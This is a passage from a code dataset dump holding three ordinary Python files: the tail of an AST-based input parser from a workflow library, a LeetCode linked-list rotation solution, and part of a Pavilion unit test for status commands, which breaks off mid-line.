warnings.warn(Warning(e.message))\n # warnings.warn(Warning(e.source))\n if not allow_errors:\n raise e from e\n return [I(from_='UNKNOWN', as_='UNKNOWN')]\n except ProflowParsingAstError as e:\n # warnings.warn(Warning(e.message))\n # warnings.warn(Warning(e.ast))\n if not allow_errors:\n raise e from e\n return [I(from_='UNKNOWN', as_='UNKNOWN')]\n\n\ndef get_inputs_list_from_lambda_fn(input_tree: ast.Assign) -> ast.List:\n if isinstance(input_tree.value, ast.Tuple):\n return input_tree.value.elts[0].body\n elif isinstance(input_tree.value, ast.Lambda):\n return input_tree.value.body\n else:\n raise ProflowParsingAstError(\n f\"Unexpected AST type: {type(input_tree.value)}\", input_tree)\n\n\ndef get_inputs_list_from_function_def(input_tree: ast.FunctionDef) -> ast.List:\n try:\n return input_tree.body[0].value\n except Exception as e:\n warnings.warn(Warning(e))\n raise ProflowParsingAstError(\n f\"Failed to get Process inputs from function: {ast.dump(input_tree)}\", input_tree)\n\n\ndef get_inputs_list(input_tree: Union[ast.Assign, ast.FunctionDef]) -> ast.List:\n if isinstance(input_tree, ast.Assign):\n return get_inputs_list_from_lambda_fn(input_tree)\n elif isinstance(input_tree, ast.FunctionDef):\n return get_inputs_list_from_function_def(input_tree)\n else:\n raise ProflowParsingAstError(\n f\"Unexpected AST type: {type(input_tree)}\", input_tree)\n\n\ndef parse_unary_op(v: ast.UnaryOp):\n if isinstance(v.op, ast.USub):\n arg, argMap = parse_arg_val(v.operand)\n return [\"-\" + str(arg), argMap]\n else:\n raise ProflowParsingAstError(f\"AST UnaryOp type not implemented: {type(v.op)}\", v)\n\n\ndef parse_bin_op(attr: ast.BinOp):\n additional_args = {}\n arg_list = []\n parsed_arg_left, _additional_args = parse_arg(attr.left)\n additional_args = {**additional_args, **_additional_args}\n parsed_arg_right, _additional_args = parse_arg(attr.right)\n additional_args = {**additional_args, **_additional_args}\n lhs = '.'.join(map(str, reversed(parsed_arg_left)))\n rhs = '.'.join(map(str, reversed(parsed_arg_right)))\n # TODO: Should we include op here?\n arg_list.append(f\"{lhs},{rhs}\")\n return arg_list, additional_args\n\n\ndef parse_arg_val(v: ast.Index) -> Tuple[str, ArgMap]:\n \"\"\"Parse a argument.\n\n Parameters\n ----------\n v : _type_\n _description_\n\n Returns\n -------\n str\n _description_\n\n Raises\n ------\n ProflowParsingAstError\n _description_\n \"\"\"\n if isinstance(v, ast.UnaryOp):\n return parse_unary_op(v)\n elif isinstance(v, ast.Name):\n return [v.id, {}]\n elif isinstance(v, ast.Constant):\n return [v.value, {}]\n elif isinstance(v, ast.BinOp):\n return parse_bin_op(v)\n elif isinstance(v, ast.Attribute):\n # If index is a attribute then we need to also store the mapping of\n # the variable to the index\n parsed_arg, argmap = parse_arg(v)\n in_args = \".\".join(list(reversed(parsed_arg)))\n refKey = \"*X\" # TODO: Randomly generate this so no clashes\n argmap[refKey] = in_args\n # return f\"*{v.value.id}.{v.attr}\"\n # raise Exception(\"STOP\")\n return [\"*X\", argmap]\n # return out\n else:\n raise ProflowParsingAstError(f\"AST value type not implemented: {type(v)}\", v)\n\n\ndef parse_arg_index(i: Union[ast.Index, ast.Slice]) -> Tuple[str, ArgMap]:\n \"\"\"Parse an ast Index.\n\n If the index is a constant value it just returns it as a string.\n E.g. data[1] returns \"1\"\n\n If the index is a variable it returns the index as a reference along with the parsed index\n E.g. data[config.a] returns \"X123\" and {\"config.a\": \"X123\"}\n\n Parameters\n ----------\n i : ast.Index\n _description_\n\n Returns\n -------\n Tuple[str, dict]\n _description_\n\n Raises\n ------\n ProflowParsingAstError\n _description_\n\n \"\"\"\n return parse_arg(i)\n # if isinstance(i, ast.Slice):\n # [top], _additional_args_top = parse_arg(i.upper)\n # [bottom], _additional_args_bottom = parse_arg(i.lower)\n # step, _additional_args_step = parse_arg(i.step)if i.step else [None, {}]\n # out = f\"{bottom}:{top}\" + (f\":{step}\" if step else \"\")\n # out_args = {**_additional_args_top, **_additional_args_bottom, **_additional_args_step}\n # return out, out_args\n # elif isinstance(i, ast.Index):\n # if isinstance(i.value, ast.Constant):\n # return [i.value.value, {}]\n # elif isinstance(i, ast.Index):\n # return parse_arg_val(i.value)\n # else:\n # raise ProflowParsingAstError(f\"AST index type not implemented: {type(i)}\", i)\n # else:\n # raise ProflowParsingAstError(f\"AST index type not implemented: {type(i)}\", i)\n\n\ndef parse_list_comp(attr: ast.ListComp):\n additional_args = {}\n # [ELT for KEYS in GEN]\n\n # ELT\n elt_arg, _additional_args = parse_arg(attr.elt)\n additional_args = {**additional_args, **_additional_args}\n ELT_ID = \"ELT\"\n ELT = \".\".join(reversed(elt_arg))\n additional_args[ELT_ID] = ELT\n list_comp_ids = []\n for i, comprehension in enumerate(attr.generators):\n # KEYS\n # comprehension = attr.generators[0]\n key_arg, _additional_args = parse_arg(comprehension.target)\n additional_args = {**additional_args, **_additional_args}\n\n # GEN\n # assert isinstance(\n # comprehension.iter, ast.Call\n # ) and comprehension.iter.func.id == \"range\", \"Only Range comprehension is implemented\"\n gen_arg, _additional_args = parse_arg(comprehension.iter)\n additional_args = {**additional_args, **_additional_args}\n\n GEN_ID = f\"GEN_{i}\"\n for k in key_arg:\n additional_args[k] = GEN_ID\n\n additional_args[GEN_ID] = \".\".join(reversed(gen_arg))\n\n # for k in elt_arg:\n # additional_args[k] = \"ELT\"\n list_comp_id = f\"LIST_COMP(list_comp_{i})\" # TODO: Randomly gen id\n additional_args[list_comp_id] = f\"{ELT_ID}.{i}\"\n list_comp_ids.append(list_comp_id)\n return [\"(\" + \",\".join(list_comp_ids) + \")\"], additional_args\n\n\ndef parse_list(attr: ast.List) -> Tuple[List[str], dict]:\n out = \"\"\n for i, elt in enumerate(attr.elts):\n parsed_arg, _additional_args = parse_arg(elt)\n out = out + \".\".join(reversed([str(v) for v in parsed_arg]))\n if i != len(attr.elts) - 1:\n out = out + \",\"\n return out, _additional_args\n\n\ndef parse_fn_getattr(attr: ast.Call) -> Tuple[List[str], dict]:\n key = attr.args[0].id\n args, additional_args = parse_arg(attr.args[1])\n return [[*args, key], additional_args]\n\n\ndef parse_fn_len(attr: ast.Call) -> Tuple[List[str], dict]:\n return parse_arg(attr.args[0])\n\n\ndef parse_fn(attr: ast.Call) -> Tuple[List[str], dict]:\n arg_list = []\n additional_args = {}\n if attr.func.id == \"getattr\":\n parsed_args, _additional_args = parse_fn_getattr(attr)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"asdict\":\n parsed_args, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"len\":\n parsed_args, _additional_args = parse_fn_len(attr)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"lget\":\n parsed_arg_1, _additional_args = parse_arg(attr.args[1])\n additional_args = {**additional_args, **_additional_args}\n parsed_arg_0, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg_1 + parsed_arg_0\n elif attr.func.id == \"list\":\n # NOTE: We disregard that list function is called and just parse contents\n parsed_args, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"dict\":\n raise NotImplementedError(\"Dict not implemented\")\n elif attr.func.id == \"sum\":\n assert len(attr.args) == 1, \"Sum only implemented when arg length is 1\"\n parsed_arg, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = [\"_SUM()\"] + arg_list + parsed_arg\n elif attr.func.id == \"max\":\n assert len(attr.args) == 1, \"Max only implemented when arg length is 1\"\n parsed_arg, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = [\"_MAX()\"] + arg_list + parsed_arg\n elif attr.func.id == \"min\":\n assert len(attr.args) == 1, \"Min only implemented when arg length is 1\"\n parsed_arg, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = [\"_MIN()\"] + arg_list + parsed_arg\n elif attr.func.id == \"range\":\n RANGE_ARG_ID = f\"RANGE_ARG_{get_id()}\"\n out = f\"{RANGE_ARG_ID}._RANGE()\"\n for i, arg in enumerate(attr.args):\n # assert len(attr.args) == 1, \"Range only implemented when arg length is 1\"\n ARG_ID = f\"{RANGE_ARG_ID}.{i}\" # TODO: Generate this\n parsed_arg, _additional_args = parse_arg(arg)\n additional_args = {**additional_args, **_additional_args}\n additional_args[ARG_ID] = \".\".join(reversed([str(a) for a in parsed_arg]))\n arg_list.append(out)\n elif attr.func.id == \"reversed\":\n REVERSED_ARG_ID = f\"REVERSED_ARG_{get_id()}\"\n out = f\"{REVERSED_ARG_ID}._REVERSED()\"\n for i, arg in enumerate(attr.args):\n # assert len(attr.args) == 1, \"REVERSED only implemented when arg length is 1\"\n ARG_ID = f\"{REVERSED_ARG_ID}.{i}\" # TODO: Generate this\n parsed_arg, _additional_args = parse_arg(arg)\n additional_args = {**additional_args, **_additional_args}\n additional_args[ARG_ID] = \".\".join(reversed([str(a) for a in parsed_arg]))\n arg_list.append(out)\n else:\n warnings.warn(Warning(f\"Parsing for func: {attr.func.id} has not been implemented\"))\n arg_list += [parse_arg(a) for a in attr.args]\n # TODO: Parse kwargs!\n if len(attr.keywords) > 0:\n raise NotImplementedError(\"Kwargs not implemented\")\n return arg_list, additional_args\n\n\ndef parse_arg(attr: ast.Attribute) -> Tuple[List[str], ArgMap]:\n \"\"\"Takes a parameter path such as config.a.b and recursively pulls out the string rep.\n\n E.g.\n I(config.a.foo.bar, as_='x') returns [['config', 'a', 'foo', 'bar'], None]\n I(config.a.[config.b].bar, as_='x') returns [['config', 'a', '*X', 'bar'], {\"config.b\": \"*X\"}]\n\n \"\"\"\n arg_list = []\n additional_args = {}\n if isinstance(attr, ast.Attribute):\n arg_list.append(attr.attr)\n parsed_arg, _additional_args = parse_arg(attr.value)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg\n elif isinstance(attr, ast.Name):\n arg_list.append(attr.id)\n elif isinstance(attr, ast.Constant):\n arg_list.append(attr.value)\n elif isinstance(attr, ast.Index):\n parsed_arg, _additional_args = parse_arg_val(attr.value)\n arg_list.append(parsed_arg)\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.Subscript):\n index, _additional_args = parse_arg_index(attr.slice)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + index\n # arg_list.append(index)\n parsed_arg, _additional_args = parse_arg(attr.value)\n arg_list = arg_list + parsed_arg\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.ListComp):\n parsed_arg, _additional_args = parse_list_comp(attr)\n arg_list = arg_list + parsed_arg\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.BinOp):\n parsed_args, _additional_args = parse_bin_op(attr)\n arg_list = arg_list + parsed_args\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.BoolOp):\n _addtional_args_op = {\n \"op\": attr.op.__class__.__name__,\n }\n additional_args = {**additional_args, **_addtional_args_op}\n parsed_arg_left, _additional_args = parse_arg(attr.values[0])\n additional_args = {**additional_args, **_additional_args}\n parsed_arg_right, _additional_args = parse_arg(attr.values[1])\n additional_args = {**additional_args, **_additional_args}\n lhs = '.'.join(map(str, reversed(parsed_arg_left)))\n rhs = '.'.join(map(str, reversed(parsed_arg_right)))\n arg_list.append(f\"{lhs},{rhs}\")\n elif isinstance(attr, ast.Compare):\n parsed_arg_left, _additional_args = parse_arg(attr.left)\n additional_args = {**additional_args, **_additional_args}\n lhs = '.'.join(reversed(parsed_arg_left))\n parsed_arg_comparator, _additional_args = parse_arg(attr.comparators[0])\n additional_args = {**additional_args, **_additional_args}\n # TODO: Check this handles all comparitors\n rhs = '.'.join(reversed(parsed_arg_comparator))\n arg_list.append(f\"{lhs},{rhs}\")\n elif isinstance(attr, ast.Slice):\n # TODO: Check this ok\n [top], _additional_args_top = parse_arg(attr.upper)\n [bottom], _additional_args_bottom = parse_arg(attr.lower)\n step, _additional_args_step = parse_arg(attr.step)if attr.step else [None, {}]\n index = f\"{bottom}:{top}\" + (f\":{step}\" if step else \"\")\n _additional_args = {**_additional_args_top, **\n _additional_args_bottom, **_additional_args_step}\n arg_list.append(index)\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.Call):\n parsed_args, _additional_args = parse_fn(attr)\n arg_list = arg_list + parsed_args\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.IfExp):\n # TODO: Implement this\n arg_list.append(\"AST PARSE NOT_IMPLEMENTED\")\n elif isinstance(attr, ast.Tuple):\n for elt in attr.elts:\n parsed_arg, _additional_args = parse_arg(elt)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg\n\n elif isinstance(attr, ast.List): # NOTE: Not currently supported\n for elt in attr.elts:\n parsed_arg, _additional_args = parse_arg(elt)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg\n # # TODO: Fix this\n # parsed_arg, _additional_args = parse_arg(elt)\n # arg_list.append(parse_list(attr))\n # arg_list = arg_list + parse_arg(attr.value)\n else:\n warnings.warn(\"Failed to parse args\")\n # warnings.warn(ast.dump(attr))\n raise ProflowParsingAstError(f\"AST type parse arg not implemented: {type(attr)}\", attr)\n return arg_list, additional_args\n\n\ndef parse_input_element(inp: ast.Call) -> Tuple[List[str], ArgMap]:\n \"\"\"Pull input string from an I object.\n\n E.g\n I(config.a.foo.bar, as_='x') will return \"config.a.foo.bar\".\n\n Parameters\n ----------\n inp : ast.Call\n _description_\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n if isinstance(inp, ast.Starred):\n return [], {}\n # TODO: Should throw an error!\n raise NotImplementedError(\"Starred not implemented\")\n assert inp.func.id == \"I\", \"input must be instance of a I object\"\n in_arg_tree: ast.Attribute = inp.args[0]\n args_out, additional_argmap = parse_arg(in_arg_tree)\n in_args = list(reversed(args_out))\n return in_args, additional_argmap\n\n\ndef parse_output_element(inp):\n in_args = list(reversed(parse_arg(inp)))\n return in_args\n\n\ndef parse_as_arg(v):\n if isinstance(v, ast.Constant):\n return v.value\n raise ProflowParsingAstError(f\"Value type parsing not implemented: {type(v)}\", v)\n\n\ndef parse_input_map_to_arg(inp: ast.Call) -> str:\n \"\"\"Get the _as value from an I object instance.\n\n\n E.g.\n I(config.a.foo.bar, as_='x') will return \"x\".\n\n\n Parameters\n ----------\n inp : ast.Call\n _description_\n\n Returns\n -------\n str\n _description_\n \"\"\"\n\n if isinstance(inp, ast.Starred):\n return \"\"\n # TODO: Should throw an error!\n raise NotImplementedError(\"Starred not implemented\")\n assert len(inp.keywords) >= 0 and inp.keywords[0].arg == \"as_\", \"first keyword should be as_\"\n as_arg = inp.keywords[0]\n return parse_as_arg(as_arg.value)\n\n\ndef get_inputs(input_list: ast.List) -> ArgMap:\n input_mapping = {}\n for i in input_list.elts:\n in_args, additional_mappings = parse_input_element(i)\n assert in_args is not None, \"Could not get input args!\"\n k = parse_input_map_to_arg(i)\n map_from = '.'.join(map(str, in_args))\n input_mapping[k] = map_from\n input_mapping = {**input_mapping, **additional_mappings}\n return input_mapping\n\n\ndef parse_output_target(out_el):\n if isinstance(out_el, ast.Constant):\n return out_el.value\n if isinstance(out_el, ast.FormattedValue):\n return f\"{{{out_el.value.id}}}\"\n elif isinstance(out_el, ast.JoinedStr):\n elts = list(map(parse_output_target, out_el.values))\n return '.'.join(elts)\n else:\n raise NotImplementedError(f\"Ast type not implemented: {type(out_el)}\")\n\n\ndef parse_output(inp: ast.Tuple) -> Tuple[str, str]:\n assert isinstance(inp, ast.Tuple)\n assert len(inp.elts) == 2, f\"Expected only 2 elements in tuple but got {len(inp.elts)}\"\n result, target = inp.elts\n result_arg = parse_output_element(result)\n out_as_arg = parse_output_target(target)\n return result_arg, out_as_arg\n\n\ndef get_outputs_from_lambda_body(input_list: ast.List):\n input_mapping = {}\n if isinstance(input_list, ast.List):\n for i in input_list.elts:\n in_args, out_as_arg = parse_output(i)\n assert in_args, \"Could not get input args!\"\n assert out_as_arg, \"Could not get input args!\"\n k = '.'.join(map(str, in_args))\n input_mapping[k] = out_as_arg\n elif isinstance(input_list, ast.ListComp):\n # For now we just treat a list comp as a single output\n in_args, out_as_arg = parse_output(input_list.elt)\n assert in_args, \"Could not get input args!\"\n assert out_as_arg, \"Could not get input args!\"\n k = '.'.join(map(str, in_args))\n input_mapping[k] = out_as_arg\n else:\n raise NotImplementedError(f\"Ast type not implemented: {type(input_list)}\")\n return input_mapping\n\n\ndef parse_inputs(\n map_inputs_fn: Callable[[any], List[I]], allow_errors: bool = True, silent=False,\n) -> dict:\n source_code = textwrap.dedent(inspect.getsource(map_inputs_fn))\n ast_tree = ast.parse(source_code)\n if source_code[0:5] == \"field\":\n return {} # input function is not set\n try:\n inputs_list = get_inputs_list(ast_tree.body[0])\n inputs_map = get_inputs(inputs_list)\n return inputs_map\n except ProflowParsingError as e:\n if not silent:\n print(\"ProFlowParsingError\\n==================\")\n print(e)\n if not allow_errors:\n raise e from e\n else:\n\n return {}\n except ProflowParsingLineError as e:\n if not silent:\n print(\"ProFlowParsingLineError\\n==================\")\n print(e)\n if not allow_errors:\n raise e from e\n else:\n return {}\n except ProflowParsingAstError as e:\n if not silent:\n print(\"ProFlowParsingAstError\\n==================\")\n print(e)\n if not allow_errors:\n raise e from e\n else:\n return {}\n except Exception as e:\n if not allow_errors:\n print(\"ProFlowParsingFunctionError\\n==================\")\n print(source_code)\n print(\"============\")\n print(ast.dump(ast_tree))\n print(\"==========end====\")\n raise e from e\n print(\"ProFlowParsingFunctionError\\n==================\")\n print(e)\n print(ast.dump(ast_tree))\n raise ProflowParsingFunctionError(\n \"Failed to get inputs for source\", map_inputs_fn) from e\n else:\n # raise e\n # return str(e)\n # print(e)\n return \"FAILED_TO_PARSE_PROCESS\"\n\n\ndef parse_outputs_b(map_inputs_fn: Callable[[any], List[I]]) -> dict:\n source_code = textwrap.dedent(inspect.getsource(map_inputs_fn))\n try:\n ast_tree = ast.parse(source_code)\n inputs_list = get_inputs_list(ast_tree.body[0])\n inputs_map = get_outputs_from_lambda_body(inputs_list)\n return inputs_map\n except Exception as e:\n raise e from e\n\n\ndef parse_outputs(\n map_outputs_fn: Callable[[any], List[I]], allow_errors: bool = True, silent=True,\n) -> dict:\n try:\n output_lines = parse_outputs_to_interface(map_outputs_fn, allow_errors)\n outputs_map = {\n parse_key(i.from_): f'{rm_inv_comma(i.as_.strip())}'\n for i in output_lines}\n return outputs_map\n except Exception as e:\n if not silent:\n warnings.warn(\"Error parsing outputs\")\n warnings.warn(inspect.getsource(map_outputs_fn))\n if not allow_errors:\n raise e from e\n else:\n return \"UNKNOWN\"\n\n\ndef fieldNotEmpty(f: Union[any, Callable]) -> bool:\n return f and callable(f)\n\n\ndef inspect_process(process: 'Process'):\n Parsed = namedtuple(\n 'Parsed', 'config_inputs state_inputs parameter_inputs additional_inputs state_outputs')\n try:\n return Parsed(\n config_inputs=fieldNotEmpty(\n process.config_inputs) and parse_inputs(process.config_inputs),\n state_inputs=fieldNotEmpty(process.state_inputs) and parse_inputs(process.state_inputs),\n parameter_inputs=fieldNotEmpty(\n process.state_inputs) and parse_inputs(process.state_inputs),\n additional_inputs=fieldNotEmpty(\n process.additional_inputs) and parse_inputs(process.additional_inputs),\n state_outputs=fieldNotEmpty(\n process.state_outputs) and parse_outputs(process.state_outputs),\n )\n except Exception as e:\n raise ProflowParsingError(str(e), process)\n\n\ndef inspect_process_to_interfaces(process: 'Process'):\n Parsed = namedtuple(\n 'Parsed', 'config_inputs state_inputs parameter_inputs additional_inputs state_outputs')\n try:\n return Parsed(\n config_inputs=fieldNotEmpty(\n process.config_inputs) and parse_inputs_to_interface(process.config_inputs),\n state_inputs=fieldNotEmpty(\n process.state_inputs) and parse_inputs_to_interface(process.state_inputs),\n parameter_inputs=fieldNotEmpty(\n process.state_inputs) and parse_inputs_to_interface(process.state_inputs),\n additional_inputs=fieldNotEmpty(\n process.additional_inputs) and parse_inputs_to_interface(process.additional_inputs),\n state_outputs=fieldNotEmpty(\n process.state_outputs) and parse_outputs_to_interface(process.state_outputs),\n )\n except Exception as e:\n raise ProflowParsingError(str(e), process)\n","repo_name":"sbland/proFlow","sub_path":"proflow/process_inspector.py","file_name":"process_inspector.py","file_ext":"py","file_size_in_byte":29980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43231609340","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: kafkal\n@contact: 1051748335@qq.com\n@software: pycharm\n@file: 61.py\n@time: 2019/2/15 015 12:55\n@desc:\n给定一个链表,旋转链表,将链表每个节点向右移动 k 个位置,其中 k 是非负数。\n\n示例 1:\n\n输入: 1->2->3->4->5->NULL, k = 2\n输出: 4->5->1->2->3->NULL\n解释:\n向右旋转 1 步: 5->1->2->3->4->NULL\n向右旋转 2 步: 4->5->1->2->3->NULL\n示例 2:\n\n输入: 0->1->2->NULL, k = 4\n输出: 2->0->1->NULL\n解释:\n向右旋转 1 步: 2->0->1->NULL\n向右旋转 2 步: 1->2->0->NULL\n向右旋转 3 步: 0->1->2->NULL\n向右旋转 4 步: 2->0->1->NULL\n'''\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef rotateRight(head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n count = 1\n cur = head\n if head == None:\n return None\n while cur.next != None:\n count+=1\n cur = cur.next\n if count==1:\n return head\n k = k % count\n if k == 0:\n return head\n cur = head\n for i in range(count-k-1):\n cur = cur.next\n head_now = cur.next\n cur.next = None\n cur = head_now\n while cur.next != None:\n cur = cur.next\n cur.next = head\n return head_now\n\nl0 = ListNode(0)\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\n# l0.next=l1\nl1.next=l2\n# l2.next=l3\n# l3.next=l4\n# l4.next=l5\ncur = rotateRight(l1,2)\ns = ''\nwhile cur.next!=None:\n s += (str(cur.val)+'->')\n cur=cur.next\ns += (str(cur.val))\nprint(s)","repo_name":"kafkalm/LeetCode","sub_path":"LeetCode/61.py","file_name":"61.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11578204581","text":"import argparse\nimport io\nimport time\n\nfrom pavilion import commands\nfrom pavilion import plugins\nfrom pavilion import schedulers\nfrom pavilion import status_file\nfrom pavilion.series.series import TestSeries\nfrom pavilion.test_config import file_format\nfrom pavilion.unittest import PavTestCase\n\n\nclass StatusCmdTests(PavTestCase):\n\n def setUp(self):\n plugins.initialize_plugins(self.pav_cfg)\n\n def tearDown(self):\n plugins._reset_plugins()\n\n def test_status_arguments(self):\n status_cmd = commands.get_command('status')\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['test1', 'test2'])\n\n self.assertEqual(args.tests[0], 'test1')\n self.assertEqual(args.tests[1], 'test2')\n self.assertEqual(args.json, False)\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['-j', 'test0', 'test9'])\n\n self.assertEqual(args.tests[0], 'test0')\n self.assertEqual(args.tests[1], 'test9')\n self.assertEqual(args.json, True)\n\n def test_status_command(self):\n \"\"\"Test status command by generating a suite of tests.\"\"\"\n\n config1 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'foo': 'bar',\n },\n 'cmds': ['echo \"I $foo, punks\"'],\n },\n })\n\n config1['name'] = 'run_test0'\n\n config2 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['echo \"I $too, punks\"'],\n },\n })\n\n config2['name'] = 'run_test1'\n\n config3 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['sleep 10'],\n },\n })\n\n config3['name'] = 'run_test2'\n\n configs = [config1, config2, config3]\n\n tests = [self._quick_test(cfg) for cfg in configs]\n\n for test in tests:\n test.RUN_SILENT_TIMEOUT = 1\n\n # Make sure this doesn't explode\n series = TestSeries(self.pav_cfg, None)\n for test in tests:\n series._add_test('test', test)\n test_str = \" \".join([test.full_id for test in series.tests.values()])\n\n status_cmd = commands.get_command('status')\n status_cmd.outfile = io.StringIO()\n\n # Testing for individual tests with json output\n for test in series.tests.values():\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = ['-j', test.full_id]\n args = parser.parse_args(arg_list)\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # Testing for multiple tests with json output\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = ['-j'] + test_str.split()\n args = parser.parse_args(arg_list)\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # Testing for individual tests with tabular output\n for test in series.tests.values():\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args([test.full_id])\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # Testing for multiple tests with tabular output\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = test_str.split()\n args = parser.parse_args(arg_list)\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n def test_set_status_command(self):\n \"\"\"Test set status command by generating a suite of tests.\"\"\"\n\n config1 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'foo': 'bar',\n },\n 'cmds': ['echo \"I $foo, punks\"'],\n },\n })\n\n config1['name'] = 'run_test0'\n\n config2 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['echo \"I $too, punks\"'],\n },\n })\n\n config2['name'] = 'run_test1'\n\n config3 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['sleep 10'],\n },\n })\n\n config3['name'] = 'run_test2'\n\n configs = [config1, config2, config3]\n\n tests = [self._quick_test(cfg) for cfg in configs]\n\n for test in tests:\n test.RUN_SILENT_TIMEOUT = 1\n\n set_status_cmd = commands.get_command('set_status')\n set_status_cmd.outfile = io.StringIO()\n\n # Testing for individual tests with json output\n for test in tests:\n start_status = test.status.current()\n parser = argparse.ArgumentParser()\n set_status_cmd._setup_arguments(parser)\n arg_list = ['-s', 'RUN_USER', '-n', 'tacos are delicious', test.full_id]\n args = parser.parse_args(arg_list)\n self.assertEqual(set_status_cmd.run(self.pav_cfg, args), 0,\n \"Invalid run return for test {}\".format(test.full_id))\n end_status = test.status.current()\n\n self.assertNotEqual(end_status.state, start_status.state)\n self.assertNotEqual(end_status.note, start_status.note)\n self.assertEqual(end_status.state, 'RUN_USER')\n self.assertEqual(end_status.note, 'tacos are delicious')\n\n def test_status_command_with_sched(self):\n \"\"\"Test status command when test is 'SCHEDULED'.\"\"\"\n\n cfg = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'run': {\n 'env': {\n 'foo': 'bar',\n },\n 'cmds': ['sleep 1'],\n },\n })\n\n cfg['name'] = 'testytest'\n\n test = self._quick_test(cfg, build=False, finalize=False)\n\n test.build()\n sched = schedulers.get_plugin(test.scheduler)\n sched.schedule_tests(self.pav_cfg, [test])\n\n status_cmd = commands.get_command('status')\n status_cmd.silence()\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['test.' + str(test.id)])\n test.status.set(status_file.STATES.SCHEDULED, \"faker\")\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0,\n msg=status_cmd.clear_output())\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['-j', 'test.{}'.format(test.id)])\n test.status.set(status_file.STATES.SCHEDULED, \"faker\")\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # TODO: Test that the above have actually been set.\n\n def test_status_summary(self):\n # Testing that status works with summary flag\n status_cmd = commands.get_command('status')\n status_cmd.silence()\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = ['-s']\n args = parser.parse_args(arg_list)\n\n # Test that an empty working_dir fails correctly\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n base_cfg = self._quick_test_cfg()\n test_cfg1 = base_cfg.copy()\n test_cfg1['name'] = 'test1'\n test_cfg2 = base_cfg.copy()\n test_cfg2['name'] = 'test2'\n test_cfg3 = base_cfg.copy()\n test_cfg3['name'] = 'test3'\n\n configs = [test_cfg1, test_cfg2, test_cfg3]\n tests = [self._quick_test(cfg) for cfg in configs]\n for test in tests:\n test.RUN_SILENT_TIMEOUT = 1\n\n # Testing that summary flags return correctly\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n def test_status_history(self):\n # Testing that status works with history flag\n status_cmd = commands.get_command('status')\n out = io.StringIO()\n status_cmd.outfile = out\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n\n test = self._quick_test()\n raw = schedulers.get_plugin('raw')\n raw.schedule_tests(self.pav_cfg, [test])\n end = time.time() + 5\n while not 